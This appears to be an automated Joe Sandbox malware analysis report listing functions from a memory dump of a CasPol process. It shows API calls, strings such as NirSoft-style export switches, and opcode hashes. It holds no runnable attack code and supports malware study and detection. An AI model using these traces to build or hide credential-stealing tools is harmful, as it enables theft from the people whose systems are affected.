                                                                                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1010922700-0
                                                                                                                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                  Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                                                                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                  Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                  Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                  • API String ID: 2012295524-70141382
                                                                                                                                                                                  • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                  • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                  Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1700100422-0
                                                                                                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                  Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                  • String ID: 4$h
                                                                                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                  Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                  • String ID: %%0.%df
                                                                                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                  Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                  • String ID: caption
                                                                                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                                                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                  Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                                                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                  Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                                                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                  Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy
                                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                  • API String ID: 1284135714-318151290
                                                                                                                                                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                  Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
